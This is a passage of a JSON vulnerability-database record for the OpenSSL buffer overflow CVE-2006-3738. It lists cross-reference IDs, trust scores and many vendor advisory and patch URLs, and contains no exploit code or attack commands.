            "db": "SECUNIA",
            "id": "22094",
            "trust": 1.8
          },
          {
            "db": "SECTRACK",
            "id": "1016943",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "30161",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "26329",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "24930",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "30124",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22500",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22799",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22298",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "31492",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23038",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22460",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23915",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22385",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23155",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22487",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22654",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23680",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22626",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23794",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22633",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22772",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "24950",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "25889",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22544",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23340",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22791",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22758",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-1401",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-0343",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3902",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3869",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3860",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4401",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4314",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-2315",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4264",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4036",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4417",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4750",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3820",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-2783",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3936",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4443",
            "trust": 1.0
          },
          {
            "db": "SECTRACK",
            "id": "1017522",
            "trust": 1.0
          },
          {
            "db": "USCERT",
            "id": "TA06-333A",
            "trust": 1.0
          },
          {
            "db": "OSVDB",
            "id": "29262",
            "trust": 1.0
          },
          {
            "db": "BID",
            "id": "20246",
            "trust": 0.8
          },
          {
            "db": "CERT/CC",
            "id": "VU#386964",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "21709",
            "trust": 0.8
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620",
            "trust": 0.8
          },
          {
            "db": "XF",
            "id": "29237",
            "trust": 0.8
          },
          {
            "db": "CERT/CC",
            "id": "VU#221788",
            "trust": 0.3
          },
          {
            "db": "PACKETSTORM",
            "id": "169663",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "59899",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "50535",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "59797",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "50560",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "53990",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "58346",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "BID",
            "id": "22083"
          },
          {
            "db": "PACKETSTORM",
            "id": "169663"
          },
          {
            "db": "PACKETSTORM",
            "id": "59899"
          },
          {
            "db": "PACKETSTORM",
            "id": "50535"
          },
          {
            "db": "PACKETSTORM",
            "id": "59797"
          },
          {
            "db": "PACKETSTORM",
            "id": "50560"
          },
          {
            "db": "PACKETSTORM",
            "id": "53990"
          },
          {
            "db": "PACKETSTORM",
            "id": "58346"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "id": "VAR-200609-1209",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.28107159000000004
      },
      "last_update_date": "2025-12-21T22:00:19.673000Z",
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.4,
            "url": "http://www.securityfocus.com/bid/22083"
          },
          {
            "trust": 2.8,
            "url": "http://www.openssl.org/news/secadv_20060928.txt"
          },
          {
            "trust": 1.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102668-1"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/23280/"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/23309/"
          },
          {
            "trust": 1.3,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2006-260.htm"
          },
          {
            "trust": 1.3,
            "url": "http://www.cisco.com/warp/public/707/cisco-sr-20061108-openssl.shtml"
          },
          {
            "trust": 1.3,
            "url": "http://kolab.org/security/kolab-vendor-notice-11.txt"
          },
          {
            "trust": 1.3,
            "url": "http://www.kb.cert.org/vuls/id/547300"
          },
          {
            "trust": 1.1,
            "url": "http://issues.rpath.com/browse/rpl-613"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22385"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22172"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/26329"
          },
          {
            "trust": 1.0,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a4256"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22330"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22220"
          },
          {
            "trust": 1.0,
            "url": "http://marc.info/?l=bugtraq\u0026m=130497311408250\u0026w=2"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22116"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22799"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22094"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22654"
          },
          {
            "trust": 1.0,
            "url": "http://www.vmware.com/support/esx25/doc/esx-254-200612-patch.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3860"
          },
          {
            "trust": 1.0,
            "url": "http://www.debian.org/security/2006/dsa-1185"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22193"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22216"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4401"
          },
          {
            "trust": 1.0,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujan2007-101493.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22633"
          },
          {
            "trust": 1.0,
            "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:172"
          },
          {
            "trust": 1.0,
            "url": "http://securitytracker.com/id?1017522"
          },
          {
            "trust": 1.0,
            "url": "http://www.redhat.com/support/errata/rhsa-2008-0629.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/447318/100/0/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026y=2006\u0026m=slackware-security.676946"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22626"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22212"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23309"
          },
          {
            "trust": 1.0,
            "url": "http://lists.apple.com/archives/security-announce/2006/nov/msg00001.html"
          },
          {
            "trust": 1.0,
            "url": "http://openvpn.net/changelog.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/2783"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22460"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/470460/100/0/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/bid/20249"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22487"
          },
          {
            "trust": 1.0,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29237"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22240"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22772"
          },
          {
            "trust": 1.0,
            "url": "http://itrc.hp.com/service/cki/docdisplay.do?docid=c00805100"
          },
          {
            "trust": 1.0,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a9370"
          },
          {
            "trust": 1.0,
            "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-september/049715.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:178"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/24950"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4314"
          },
          {
            "trust": 1.0,
            "url": "http://www.debian.org/security/2006/dsa-1195"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/447393/100/0/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23915"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/25889"
          },
          {
            "trust": 1.0,
            "url": "ftp://patches.sgi.com/support/free/security/advisories/20061001-01-p.asc"
          },
          {
            "trust": 1.0,
            "url": "http://www.xerox.com/downloads/usa/en/c/cert_essnetwork_xrx07001_v1.pdf"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22298"
          },
          {
            "trust": 1.0,
            "url": "http://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23155"
          },
          {
            "trust": 1.0,
            "url": "http://www.redhat.com/support/errata/rhsa-2006-0695.html"
          },
          {
            "trust": 1.0,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2006-220.htm"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4036"
          },
          {
            "trust": 1.0,
            "url": "http://www.serv-u.com/releasenotes/"
          },
          {
            "trust": 1.0,
            "url": "ftp://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2008-007.txt.asc"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22165"
          },
          {
            "trust": 1.0,
            "url": "http://securitytracker.com/id?1016943"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/456546/100/200/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22259"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23038"
          },
          {
            "trust": 1.0,
            "url": "http://www.novell.com/linux/security/advisories/2006_24_sr.html"
          },
          {
            "trust": 1.0,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102711-1"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/2315"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3820"
          },
          {
            "trust": 1.0,
            "url": "http://sourceforge.net/project/shownotes.php?release_id=461863\u0026group_id=69227"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/1401"
          },
          {
            "trust": 1.0,
            "url": "http://docs.info.apple.com/article.html?artnum=304829"
          },
          {
            "trust": 1.0,
            "url": "http://www.trustix.org/errata/2006/0054"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23280"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22130"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22166"
          },
          {
            "trust": 1.0,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-201531-1"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/0343"
          },
          {
            "trust": 1.0,
            "url": "http://www.ubuntu.com/usn/usn-353-1"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23794"
          },
          {
            "trust": 1.0,
            "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c01118771"
          },
          {
            "trust": 1.0,
            "url": "http://security.freebsd.org/advisories/freebsd-sa-06:23.openssl.asc"
          },
          {
            "trust": 1.0,
            "url": "http://www.openpkg.org/security/advisories/openpkg-sa-2006.021-openssl.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4443"
          },
          {
            "trust": 1.0,
            "url": "http://www.osvdb.org/29262"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/31492"
          },
          {
            "trust": 1.0,
            "url": "http://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3902"
          },
          {
            "trust": 1.0,
            "url": "http://www.cisco.com/en/us/products/hw/contnetw/ps4162/tsd_products_security_response09186a008077af1b.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22260"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22284"
          },
          {
            "trust": 1.0,
            "url": "http://www.novell.com/linux/security/advisories/2006_58_openssl.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22500"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3869"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22186"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/30124"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/30161"
          },
          {
            "trust": 1.0,
            "url": "http://www.gentoo.org/security/en/glsa/glsa-200612-11.xml"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22544"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23680"
          },
          {
            "trust": 1.0,
            "url": "http://www.gentoo.org/security/en/glsa/glsa-200805-07.xml"
          },
          {
            "trust": 1.0,
            "url": "http://security.gentoo.org/glsa/glsa-200610-11.xml"
          },
          {
            "trust": 1.0,
            "url": "http://itrc.hp.com/service/cki/docdisplay.do?docid=c00849540"
          },
          {
            "trust": 1.0,
            "url": "https://www2.itrc.hp.com/service/cki/docdisplay.do?docid=c00967144"
          },
          {
            "trust": 1.0,
            "url": "http://www130.nortelnetworks.com/go/main.jsp?cscat=bltndetail\u0026documentoid=498093\u0026renditionid=\u0026poid=8881"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3936"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4750"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22791"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22758"
          },
          {
            "trust": 1.0,
            "url": "http://www.vmware.com/support/vi3/doc/esx-3069097-patch.html"
          },
          {
            "trust": 1.0,
            "url": "http://openbsd.org/errata.html#openssl2"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4264"
          },
          {
            "trust": 1.0,
            "url": "http://www.vmware.com/support/vi3/doc/esx-9986131-patch.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.us-cert.gov/cas/techalerts/ta06-333a.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.vmware.com/support/esx25/doc/esx-253-200612-patch.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/24930"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23340"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22207"
          },
          {
            "trust": 1.0,
            "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:177"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4417"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu%23386964/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.securityfocus.com/bid/20246"
          },
          {
            "trust": 0.8,
            "url": "http://www.imc.org/ietf-openpgp/mail-archive/msg14307.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.matasano.com/log/469/many-rsa-signatures-may-be-forgeable-in-openssl-and-elsewhere/"
          },
          {
            "trust": 0.8,
            "url": "http://www.openssl.org/news/secadv_20060905.txt "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/21709/"
          },
          {
            "trust": 0.8,
            "url": "http://www.rsasecurity.com/rsalabs/node.asp?id=2125"
          },
          {
            "trust": 0.8,
            "url": "http://www.ietf.org/rfc/rfc3447.txt"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu%23547300/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-september/049715.html "
          },
          {
            "trust": 0.8,
            "url": "https://issues.rpath.com/browse/rpl-613 "
          },
          {
            "trust": 0.8,
            "url": "http://www.openssl.org/news/secadv_20060928.txt "
          },
          {
            "trust": 0.8,
            "url": "http://kolab.org/security/kolab-vendor-notice-11.txt "
          },
          {
            "trust": 0.8,
            "url": "http://openvpn.net/changelog.html "
          },
          {
            "trust": 0.8,
            "url": "http://www.serv-u.com/releasenotes/ "
          },
          {
            "trust": 0.8,
            "url": "http://openbsd.org/errata.html#openssl2 "
          },
          {
            "trust": 0.8,
            "url": "http://www.securityfocus.com/bid/20249 "
          },
          {
            "trust": 0.8,
            "url": "http://securitytracker.com/id?1016943 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22130 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22094 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22165 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22186 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22193 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22207 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22259 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22260 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22166 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22172 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22212 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22240 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22216 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22116 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22220 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22284 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22330 "
          },
          {
            "trust": 0.8,
            "url": "http://xforce.iss.net/xforce/xfdb/29237 "
          },
          {
            "trust": 0.6,
            "url": "http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html"
          },
          {
            "trust": 0.6,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0264.html"
          },
          {
            "trust": 0.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-3738"
          },
          {
            "trust": 0.3,
            "url": "http://www.cisco.com/warp/public/707/cisco-air-20061108-openssl.shtml"
          },
          {
            "trust": 0.3,
            "url": "http://www.itefix.no/phpws/index.php?module=announce\u0026ann_user_op=view\u0026ann_id=80"
          },
          {
            "trust": 0.3,
            "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c00967144"
          },
          {
            "trust": 0.3,
            "url": "http://www1.itrc.hp.com/service/cki/docdisplay.do?admit=-682735245+1165342903618+28353475\u0026docid=c00805100"
          },
          {
            "trust": 0.3,
            "url": "http://www14.software.ibm.com/webapp/set2/sas/f/hmc/home.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.ipcop.org/modules.php?op=modload\u0026name=news\u0026file=article\u0026sid=31\u0026mode=thread\u0026order=0\u0026thold=0"
          },
          {
            "trust": 0.3,
            "url": "http://www.ingate.com/relnote-452.php"
          },
          {
            "trust": 0.3,
            "url": "http://www.cyberguard.info/snapgear/releases.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.stonesoft.com/en/support/security_advisories/2909_2006.html"
          },
          {
            "trust": 0.3,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102711-1\u0026searchclause="
          },
          {
            "trust": 0.3,
            "url": "/archive/1/481217"
          },
          {
            "trust": 0.3,
            "url": "https://www.itrc.hp.com/service/cki/docdisplay.do?docid=emr_na-c02475053"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0525.html"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0629.html"
          },
          {
            "trust": 0.3,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102668-1\u0026searchclause="
          },
          {
            "trust": 0.3,
            "url": "http://www116.nortelnetworks.com/pub/repository/clarify/document/2006/44/021420-01.pdf"
          },
          {
            "trust": 0.3,
            "url": "http://a1851.g.akamaitech.net/f/1851/2996/24h/cacheb.xerox.com/downloads/usa/en/c/cert_essnetwork_xrx07001_v1.pdf"
          },
          {
            "trust": 0.3,
            "url": "http://www.red-database-security.com/advisory/oracle_buffer_overflow_ons.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.red-database-security.com/advisory/oracle_xmldb_css2.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.red-database-security.com/advisory/oracle_cpu_jan_2007.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.integrigy.com/security-resources/analysis/oracle-cpu-january-2007/view"
          },
          {
            "trust": 0.3,
            "url": "http://www.integrigy.com/security-resources/analysis/cpu-january-2007-tech-matrix/view"
          },
          {
            "trust": 0.3,
            "url": "http://www.appsecinc.com/resources/alerts/oracle/2007-01.shtml"
          },
          {
            "trust": 0.3,
            "url": "http://www.appsecinc.com/resources/alerts/oracle/2007-03.shtml"
          },
          {
            "trust": 0.3,
            "url": "http://www.appsecinc.com/resources/alerts/oracle/2007-06.shtml"
          },
          {
            "trust": 0.3,
            "url": "http://www.appsecinc.com/resources/alerts/oracle/2007-02.shtml"
          },
          {
            "trust": 0.3,
            "url": "http://www.oracle.com/index.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_aq_inv.html"
          },
          {
            "trust": 0.3,
            "url": "https://www.it-isac.org/postings/cyber/alertdetail.php?id=4092"
          },
          {
            "trust": 0.3,
            "url": "http://www.kb.cert.org/vuls/id/221788"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/457193"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/464470"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/458657"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/458036"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/458006"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/458037"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/458005"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/458041"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/458038"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/458475"
          },
          {
            "trust": 0.3,
            "url": "http://docs.info.apple.com/article.html?artnum=307177"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-2940"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-4343"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-2937"
          },
          {
            "trust": 0.3,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-3738"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-5135"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5135"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-4339"
          },
          {
            "trust": 0.2,
            "url": "http://www.itrc.hp.com/service/cki/secbullarchive.do"
          },
          {
            "trust": 0.2,
            "url": "http://h30046.www3.hp.com/driveralertprofile.php?regioncode=na\u0026langcode=useng\u0026jumpid=in_sc-gen__driveritrc\u0026topiccode=itrc"
          },
          {
            "trust": 0.2,
            "url": "http://h30046.www3.hp.com/subsignin.php"
          },
          {
            "trust": 0.1,
            "url": "https://www.openssl.org/source/"
          },
          {
            "trust": 0.1,
            "url": "https://www.niscc.gov.uk)."
          },
          {
            "trust": 0.1,
            "url": "https://www.openssl.org/source/mirror.html):"
          },
          {
            "trust": 0.1,
            "url": "http://bugs.gentoo.org."
          },
          {
            "trust": 0.1,
            "url": "http://creativecommons.org/licenses/by-sa/2.5"
          },
          {
            "trust": 0.1,
            "url": "http://enigmail.mozdev.org"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3108"
          },
          {
            "trust": 0.1,
            "url": "http://security.gentoo.org/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3108"
          },
          {
            "trust": 0.1,
            "url": "http://security.gentoo.org/glsa/glsa-200710-06.xml"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/"
          },
          {
            "trust": 0.1,
            "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2940"
          },
          {
            "trust": 0.1,
            "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-3738"
          },
          {
            "trust": 0.1,
            "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2937"
          },
          {
            "trust": 0.1,
            "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-4343"
          },
          {
            "trust": 0.1,
            "url": "http://security.freebsd.org/patches/sa-07:08/openssl.patch.asc"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3738"
          },
          {
            "trust": 0.1,
            "url": "http://security.freebsd.org/\u003e."
          },
          {
            "trust": 0.1,
            "url": "http://security.freebsd.org/advisories/freebsd-sa-07:08.openssl.asc"
          },
          {
            "trust": 0.1,
            "url": "http://security.freebsd.org/patches/sa-07:08/openssl.patch"
          },
          {
            "trust": 0.1,
            "url": "http://marc.info/?l=bugtraq\u0026m=119091888624735"
          },
          {
            "trust": 0.1,
            "url": "http://pgp.openpkg.org"
          },
          {
            "trust": 0.1,
            "url": "http://www.openssl.org/"
          },
          {
            "trust": 0.1,
            "url": "http://www.openpkg.org"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-4343"
          },
          {
            "trust": 0.1,
            "url": "http://www.openpkg.org/security/"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2940"
          },
          {
            "trust": 0.1,
